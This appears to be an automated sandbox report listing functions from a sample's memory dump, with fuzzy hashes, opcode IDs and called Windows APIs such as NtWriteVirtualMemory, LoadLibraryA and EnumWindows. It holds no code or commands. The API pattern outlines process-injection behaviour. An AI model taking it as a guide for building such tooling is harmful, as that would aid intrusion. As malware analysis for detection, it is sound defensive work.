Opcode Fuzzy Hash: dbcaf389765f927f41fedd9c3881e9a167dd8d9f69122c28e5cc2636475e6dac
Instruction Fuzzy Hash: 20523EB1608349AFDB74CF28DC85BEABBB2FF95300F158219DC899B214D3359A91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D126E7, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 687COMMON

Download Yara Rule

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ^n(D
API String ID: 0-1681091204
Opcode ID: 952fb88235e2c116049fdf8d7eda4569f538c30803ffdc2eb7cf088079ab11c8
Instruction ID: b1d367ffac33fa397c205d4a590f81a54e4b7fcaa9093f146c95e897810a8990
Opcode Fuzzy Hash: 952fb88235e2c116049fdf8d7eda4569f538c30803ffdc2eb7cf088079ab11c8
Instruction Fuzzy Hash: 77523EB2604349AFDB74DF28DC857DABBB2FF95310F15821ADC899B214D3349A91CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03D14DF2, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0
LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: ^n(D
API String ID: 3569954152-1681091204
Opcode ID: 97ce115e5b3460818ae25da480d805c3725940fedc5a75538d92f7e28392a3f7
Instruction ID: d7c96cfefcae6eae12163eed30b5e561785be4d17cf56c423e21416bd63cc577
Opcode Fuzzy Hash: 97ce115e5b3460818ae25da480d805c3725940fedc5a75538d92f7e28392a3f7
Instruction Fuzzy Hash: 495230B1604349AFDB74CF28DC85BDABBB2FF95310F54821ADC899B214D3359A91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D14F79, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 602nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 03D18776: LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: ^n(D
API String ID: 3569954152-1681091204
Opcode ID: 9423bb8f0944411dd00e7d381b3fd3a37f0f6b43e772abbdbf787650d53da218
Instruction ID: c7d100cf148ff5b4cfd5bc21ae29a5a05fc3b358daed673e83bb6ecb795f9bdd
Opcode Fuzzy Hash: 9423bb8f0944411dd00e7d381b3fd3a37f0f6b43e772abbdbf787650d53da218
Instruction Fuzzy Hash: D2421EB1604389AFDB74CF28DC85BDAB7B2FF95310F54822ADC899B214D3359A91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D15072, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 585nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 03D18776: LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: ^n(D
API String ID: 3569954152-1681091204
Opcode ID: 03d117aefef630223f789788b8eee023bfd3476f17b5b5d8de6b83dd8c2eaf2c
Instruction ID: c917e930dee71e24d8e76081eba8cf1781801da4a09499a5d54363bd904b5ad6
Opcode Fuzzy Hash: 03d117aefef630223f789788b8eee023bfd3476f17b5b5d8de6b83dd8c2eaf2c
Instruction Fuzzy Hash: 143220B1604389AFDB74CF28DC857DABBB2FF95310F54822ADC898B214D3359A91CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D151C1, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 514nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: ^n(D
API String ID: 3527976591-1681091204
Opcode ID: 7dbea5fc9d0c100fa32e2992fc16cd57f49469341ad6cfda537eec4378ac6639
Instruction ID: 78f6cb68a6a85216ed0a7a5234a61b8c49e3bd02ad140b4c66cd5d7f155097bd
Opcode Fuzzy Hash: 7dbea5fc9d0c100fa32e2992fc16cd57f49469341ad6cfda537eec4378ac6639
Instruction Fuzzy Hash: 9C22FEB2604349AFDB74CF28DC85BDAB7B2FF95310F54822ADC899B214D3359A91CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D152C9, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 476nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Strings

^n(D, xrefs: 03D153C7

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: ^n(D
API String ID: 3527976591-1681091204
Opcode ID: c98cf01b697c34789e06ef60912138e97aca81ed02587ee20ca73dfa27a21fb8
Instruction ID: 8afed6563b336c82e0816264319131694429e5d3496d5549fb0b9e9c6a09a33e
Opcode Fuzzy Hash: c98cf01b697c34789e06ef60912138e97aca81ed02587ee20ca73dfa27a21fb8
Instruction Fuzzy Hash: 8A120F71608389AFDB74CF28DC85BEA77B2FF95310F14822ADC899B214D3359A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D10680, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

EnumWindows.USER32(?,?,00000000,?,00000000,?,?,03D1085D,?,?,?,?,?,00000040,00000000,?), ref: 03D10723

Strings

-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: -9m
API String ID: 1129996299-642598042
Opcode ID: b58a21173c178ec3dc4c9b9cddc7485c09d0e6cd4eac69da41b1e3cc45f1ae9c
Instruction ID: b260dff08c53c86676d2861b428aac129f7cc58d85f994e408c666379d82f34e
Opcode Fuzzy Hash: b58a21173c178ec3dc4c9b9cddc7485c09d0e6cd4eac69da41b1e3cc45f1ae9c
Instruction Fuzzy Hash: 3F713479A483589FDB34EE3498907EA77F2AF88350F95402EDC8E9B350C3748A91CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D166C6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 138memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 03D18776: LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

NtAllocateVirtualMemory.NTDLL ref: 03D168B9

Strings

q[29, xrefs: 03D16968

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: q[29
API String ID: 2616484454-542836173
Opcode ID: 8701b7042f19eeee051aefe067acb9159c91d604adafce3beff95c37fbdf1641
Instruction ID: 63bd3a377279f46ba9d616731575014a627a5666f5556f083c394e1d357f5907
Opcode Fuzzy Hash: 8701b7042f19eeee051aefe067acb9159c91d604adafce3beff95c37fbdf1641
Instruction Fuzzy Hash: 4451D070A09389EFDB24AF24D852AEEBBA0FF16310F45492DDCCA9B610D3318591CF46

Uniqueness

Uniqueness Score: -1.00%

Function 03D16795, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 111memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 03D18776: LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

NtAllocateVirtualMemory.NTDLL ref: 03D168B9

Strings

q[29, xrefs: 03D16968

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: q[29
API String ID: 2616484454-542836173
Opcode ID: cbd2c8694f427573b6972fa1f9dbce7424ce081a29bcf131ce65c1524ef4de4d
Instruction ID: 829f6f24bf5836cbabf91fc3b9bf7a7aba03d0cd90b1ea1f3b5b1d4bbc88792b
Opcode Fuzzy Hash: cbd2c8694f427573b6972fa1f9dbce7424ce081a29bcf131ce65c1524ef4de4d
Instruction Fuzzy Hash: C6410370A09389EFEB209F24D852AEDBBA0FF16714F04492DDCCA9B614D3324691CF46

Uniqueness

Uniqueness Score: -1.00%

Function 03D18F7D, Relevance: 2.7, Strings: 2, Instructions: 204COMMON

Download Yara Rule

Strings

`, xrefs: 03D190DB
-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `$-9m
API String ID: 0-2347320740
Opcode ID: 468537d222978634ab5fae8e33b58b5a4f528581fda62caf7cfaa86cdb8e68c4
Instruction ID: d61c7b72e979abff4284ca261121e353986dbb722db80b73593964627b8547fc
Opcode Fuzzy Hash: 468537d222978634ab5fae8e33b58b5a4f528581fda62caf7cfaa86cdb8e68c4
Instruction Fuzzy Hash: 29815575604388AFDF38DE34D9653EA77A2EF94350F85401ECC8E5B244C7348A86CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03D1547B, Relevance: 2.0, APIs: 1, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aaac07d6cf26797a5dc7352d25ec83d1e8f94b55a4d5665985105bb7cd176a8
Instruction ID: 30f2a10fe9c6982ad17e5b31bece62b09b22049dac36c0f43ffe6f3acdfc2e01
Opcode Fuzzy Hash: 5aaac07d6cf26797a5dc7352d25ec83d1e8f94b55a4d5665985105bb7cd176a8
Instruction Fuzzy Hash: B3120E71608388AFDB74CF34DC857EA7BA2FF96310F19812ADC899B254D3359A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D153E5, Relevance: 1.9, APIs: 1, Instructions: 432nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 35d55ddc70455a7e052450ea1ee4b751232b896d82923d4c93afcd7751d6e143
Instruction ID: 2a43b8263cf50625424c178eca1cf5ee7ddd8a2ae7123e15023648799442aab1
Opcode Fuzzy Hash: 35d55ddc70455a7e052450ea1ee4b751232b896d82923d4c93afcd7751d6e143
Instruction Fuzzy Hash: A902FF71608388AFDF74CF28DC85BEA77A6FF95310F58812ADC899B214D3359A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 03D1556D, Relevance: 1.9, APIs: 1, Instructions: 372nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: e4ab79b8923b660c94bc14645fb5a87ab312303ea2f4468fe10efb003933196b
Instruction ID: 26ae1c43b14f4d58ac8667ad6f81e436dc40805a66915d0c9ff4921a822da3e3
Opcode Fuzzy Hash: e4ab79b8923b660c94bc14645fb5a87ab312303ea2f4468fe10efb003933196b
Instruction Fuzzy Hash: 87F1ED71608389AFDF74DF28DC85BEA77A2FF95310F14852ADC899B224D3359A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D15681, Relevance: 1.8, APIs: 1, Instructions: 333nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: cfe83287ec55714ab0bc77d23e30edec79270ba43601e3ef234547302dcc2f97
Instruction ID: 552929b4c9bbe818babc3ca9750dc728ba4a9928f58825401fbfa5c93ff099af
Opcode Fuzzy Hash: cfe83287ec55714ab0bc77d23e30edec79270ba43601e3ef234547302dcc2f97
Instruction Fuzzy Hash: DAE1CF71608388AFDF74DF24DD85BEA77A2FF95310F14851ADC899B264D3329A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D157AF, Relevance: 1.8, APIs: 1, Instructions: 289nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 23ef9330a637730bf2ac9b948a4e251f1cdf654c21ae05bc515e4c1fa043c437
Instruction ID: 133241415697fb65345ed3e72efc9d8850205b2003f4927a0437e7ed04512a2e
Opcode Fuzzy Hash: 23ef9330a637730bf2ac9b948a4e251f1cdf654c21ae05bc515e4c1fa043c437
Instruction Fuzzy Hash: E7C1CD71A08388EFDF74DF24DD85BEA77A2FF95300F14851AD8899B264D3329A81CB45

Uniqueness

Uniqueness Score: -1.00%

Function 03D194E6, Relevance: 1.8, APIs: 1, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 109bfb079e3334915d4479ff8ca141612789f27e9a6c83e2d2aa7470653be158
Instruction ID: 57d316bb506726f446b45216bfeb7730427b7dfb83648372c45a42a4b3904ba7
Opcode Fuzzy Hash: 109bfb079e3334915d4479ff8ca141612789f27e9a6c83e2d2aa7470653be158
Instruction Fuzzy Hash: C6B134B2A04355AFDB30DE28D8647EEB7B2EF45350F49412ADC49AB204D3309A91CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03D158CD, Relevance: 1.7, APIs: 1, Instructions: 243nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 3abf41998364a5ece2a90199373f24d0dce3cffdc36f4cd25b0b52860211ffb0
Instruction ID: ee8b8e950ed1c6784bf505285f403a5ac7b53b7b52c5a8552e5218da675c7255
Opcode Fuzzy Hash: 3abf41998364a5ece2a90199373f24d0dce3cffdc36f4cd25b0b52860211ffb0
Instruction Fuzzy Hash: 0EA1EE71A08288EFDF74DF24DD85BEAB7B2FF55700F04812AD9899B224D3325A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D1ADCD, Relevance: 1.7, APIs: 1, Instructions: 208COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 03D1B3B5

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: 8ec61e25b66776137e892eb7e5d706c3bebc20106f6411fed7ed02921bed9d22
Instruction ID: cb0bd2b520790b4ea0a1f9cbc4331792daa4c56576d03e8a234681306c7b7cbc
Opcode Fuzzy Hash: 8ec61e25b66776137e892eb7e5d706c3bebc20106f6411fed7ed02921bed9d22
Instruction Fuzzy Hash: 25812631A44389DFDB39CF28D9A5BE9B7A2FF85700F85412BDC4A8B654C3319662CB05

Uniqueness

Uniqueness Score: -1.00%

Function 03D15A25, Relevance: 1.7, APIs: 1, Instructions: 206nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 64991bed9f46e25e3b0a8be49f2aafc9aab10de61cd4e10ce7308532b2e61a19
Instruction ID: 7ad2387f9911d8e64792d678ed444b2c12c5d3daf262982010be3bae3075a929
Opcode Fuzzy Hash: 64991bed9f46e25e3b0a8be49f2aafc9aab10de61cd4e10ce7308532b2e61a19
Instruction Fuzzy Hash: 7B91EC71A09388AFDF759F24DC85BEABBB1FF55300F08455AD8899B250C3364A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D1ADC1, Relevance: 1.7, APIs: 1, Instructions: 201COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 03D1B3B5

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: 918b45c427592ef24b7a014c57a6e152e7694ffc1c49d9799c9b7dd7c068b00d
Instruction ID: 5230a41063c61f081627c1d017908101a021424252f3d92b47581a1b7b2f6182
Opcode Fuzzy Hash: 918b45c427592ef24b7a014c57a6e152e7694ffc1c49d9799c9b7dd7c068b00d
Instruction Fuzzy Hash: 15811571604349DFDB78DE38D9987EE7BA2FF85310F95411BDC4A8B264C33496A18B12

Uniqueness

Uniqueness Score: -1.00%

Function 03D1AEBB, Relevance: 1.7, APIs: 1, Instructions: 192COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 03D1B3B5

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: a9e74b7d0d91815a864db2c88a141ce08cfa8d5325ccebb40f830ba6e60d7b5d
Instruction ID: cafd49262010d6cb1f41d4d24b6651cfc93efef4a5e63cb6508f34e9fafa0a47
Opcode Fuzzy Hash: a9e74b7d0d91815a864db2c88a141ce08cfa8d5325ccebb40f830ba6e60d7b5d
Instruction Fuzzy Hash: 96712230A48389DFDB35CF28D995BE9BBA2FF85700F85411BD84A8B614C3319652CF05

Uniqueness

Uniqueness Score: -1.00%

Function 03D1AE57, Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 03D1B3B5

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: 63bdec68bd26c753abe48b4f0e6780bc43a5b9913ecaa6d299fc53c57b12e993
Instruction ID: f13e31c043e9c0ead6c9c11de55fe29d8a7f74ce9d171f74d221a1c755fc9ee1
Opcode Fuzzy Hash: 63bdec68bd26c753abe48b4f0e6780bc43a5b9913ecaa6d299fc53c57b12e993
Instruction Fuzzy Hash: DF71F031A48389DFDB35CF28D995BE9BBA2FF85300F85415ADC4A8B664C3319662CF05

Uniqueness

Uniqueness Score: -1.00%

Function 03D1AF29, Relevance: 1.7, APIs: 1, Instructions: 190COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 03D1B3B5

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: c32caf038b527ab401d9d0a55bc0b0fe55bde9c1c7c8fa431f737060cd0f92f7
Instruction ID: 5362198d0d0e4513122b3ad10eb62ad0f94772adeb6454ce61cae2ef26852b1a
Opcode Fuzzy Hash: c32caf038b527ab401d9d0a55bc0b0fe55bde9c1c7c8fa431f737060cd0f92f7
Instruction Fuzzy Hash: B1712430A08389DFDB35CF28D995BE9BBA2FF85700F85411BD84A8B654C3319662CF05

Uniqueness

Uniqueness Score: -1.00%

Function 03D1AFA5, Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54db455455a68eec3a82305f8b9fe3f39be01baa5b6a75c25a7f36f0713ea239
Instruction ID: c72e4cff1e4ec52276343bfb47003dc9c44c10f07f440f411e2a302fef7a6b6e
Opcode Fuzzy Hash: 54db455455a68eec3a82305f8b9fe3f39be01baa5b6a75c25a7f36f0713ea239
Instruction Fuzzy Hash: 96711130A08389DFDB35CF28D995BE9BBA2FF85700F85415BD84A8B654C33196A2CF45

Uniqueness

Uniqueness Score: -1.00%

Function 03D11665, Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 03D1623B

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: c516065a7a1809528edf38948959816afdc7231dd9644d293af0f81fa3ccc00d
Instruction ID: c418ee83a5fea42671e624e7a65cf349e31736460a26e66be1dcd6b17db6a53a
Opcode Fuzzy Hash: c516065a7a1809528edf38948959816afdc7231dd9644d293af0f81fa3ccc00d
Instruction Fuzzy Hash: C2612331908389AFDB31DF38D859BEABBA0FF02310F45856DD8CA4BA95D3315596CB42

Uniqueness

Uniqueness Score: -1.00%

Function 03D15B03, Relevance: 1.7, APIs: 1, Instructions: 169nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 727975fc41a5ca442826c4c967143ecae18a2ef9a405dc1c0b89b36a4278f0ac
Instruction ID: 75e62b05b9a2e7db2eb60d5751c573f7dd88e3ed1de7ed89f0201105c306ba42
Opcode Fuzzy Hash: 727975fc41a5ca442826c4c967143ecae18a2ef9a405dc1c0b89b36a4278f0ac
Instruction Fuzzy Hash: 6771CA71A04388AFDB75DF24ED857EA7BB6FF55310F08411AD9899F220C37A5A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D1B091, Relevance: 1.7, APIs: 1, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc56bb9383611a24887392ca445b50869d5d87fa1827eba5b448fe4e43cab92b
Instruction ID: 8c96d315a2df94969f2b609cb786fc4c7f2343f209e0c0379044542c47b093ab
Opcode Fuzzy Hash: fc56bb9383611a24887392ca445b50869d5d87fa1827eba5b448fe4e43cab92b
Instruction Fuzzy Hash: 7C513430904349DFDB75CF28C995BEDBBA2FF85700F85815AD84A8B664C3329692CF05

Uniqueness

Uniqueness Score: -1.00%

Function 03D15B65, Relevance: 1.7, APIs: 1, Instructions: 151nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,B70348CF,?,00000000,?), ref: 03D15CB0

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: ccf4be8445922cbdd6a3b9ff3c9f78b426eb730b056b7cd8efa4ad083a1e7b65
Instruction ID: 0a88a244f5a26d807f12bd0d0b08b815e7d9b2e5b3a8162162ce5dedb04b1fb5
Opcode Fuzzy Hash: ccf4be8445922cbdd6a3b9ff3c9f78b426eb730b056b7cd8efa4ad083a1e7b65
Instruction Fuzzy Hash: E551DB71A09288EFDF359F24DC85BE9BBB2FF55700F08855AD9899B610C3325A91CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03D1B036, Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e9c9cfe1d29a30010b6ec09e227a09d7d159e19f1b52fac1e41c79820f467c
Instruction ID: 9a83de35012c0f8f7d819c0472ba0a78fbb0cb8b210852829aa1cc4059473780
Opcode Fuzzy Hash: 86e9c9cfe1d29a30010b6ec09e227a09d7d159e19f1b52fac1e41c79820f467c
Instruction Fuzzy Hash: 35512271604348DFDB78CE28C9987E97BA2BF85300F89401BDC4A8B364C371A662CF56

Uniqueness

Uniqueness Score: -1.00%

Function 03D12B1E, Relevance: 1.6, Strings: 1, Instructions: 387COMMON

Download Yara Rule

Strings

-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: -9m
API String ID: 2167126740-642598042
Opcode ID: bbfae1b61cecacf0168a0b34f54bfa638a932876ee1cc1cc7186ad8c240dc252
Instruction ID: 92f4c2f8b8497c55bcf0b59cbf44e81406381ec2d2ae55577ebb2d5b6d70558e
Opcode Fuzzy Hash: bbfae1b61cecacf0168a0b34f54bfa638a932876ee1cc1cc7186ad8c240dc252
Instruction Fuzzy Hash: 2BE12475A043899FDB34EF28D9917EA77A2EF48340F55402EDC8E9B314D7349A81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03D117A1, Relevance: 1.6, APIs: 1, Instructions: 125COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE ref: 03D1623B

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: c91f460646e0f0c83a5b9139b97156ab824d3f849bd5aa692015e71701c0f26d
Instruction ID: a84abb98f7c44de98e59add675628914adf141a3728c04ca2e86e870bff32a3f
Opcode Fuzzy Hash: c91f460646e0f0c83a5b9139b97156ab824d3f849bd5aa692015e71701c0f26d
Instruction Fuzzy Hash: 3B4115319083C9ABDB21CF38D809BEAFBA0BF42710F45869DD8C95B996D3315596CB41

Uniqueness

Uniqueness Score: -1.00%

Function 03D1B1CF, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

K32GetDeviceDriverBaseNameA.KERNEL32 ref: 03D1B3B5

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: BaseDeviceDriverName
String ID:
API String ID: 2335996259-0
Opcode ID: 9ab3bd362ffafc65b5707fbaff964179023e32a50c8fb0630bdd93ec664d55fd
Instruction ID: ce83220bac2f53f3a677eaf9f051bed92684f70577673aa730c474841c109069
Opcode Fuzzy Hash: 9ab3bd362ffafc65b5707fbaff964179023e32a50c8fb0630bdd93ec664d55fd
Instruction Fuzzy Hash: 27412130948348DBDB38CF18C896EE9B7A2FF85B00F95845BD84A4B654C332A292CF45

Uniqueness

Uniqueness Score: -1.00%

Function 03D145B3, Relevance: 1.6, Strings: 1, Instructions: 351COMMON

Download Yara Rule

Strings

-9m, xrefs: 03D10A25

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -9m
API String ID: 0-642598042
Opcode ID: 077288a4d53e6422a2fec2137836adb575a87520a902d28c4998619161e88f62
Instruction ID: 9c85012483f2c76bbd34fb15e45f33c44dc7ea7550ea9a848af2bef237da95d3
